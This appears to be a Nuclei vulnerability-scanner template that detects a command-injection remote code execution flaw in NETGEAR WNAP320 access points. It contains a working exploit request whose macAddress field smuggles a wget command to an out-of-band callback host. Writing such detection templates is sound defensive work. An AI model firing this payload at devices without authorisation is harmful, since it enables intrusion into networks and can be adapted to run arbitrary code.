nuclei-templates/vulnerabilities/other/netgear-wnap320-rce.yaml

27 lines
894 B
YAML

id: netgear-wnap320-rce
info:
name: NETGEAR WNAP320 Access Point - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: vulnerabilities in the web-based management interface of NETGEAR WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
reference:
- https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
tags: netgear,rce,oob,router
requests:
- raw:
- |
POST /boardDataWW.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"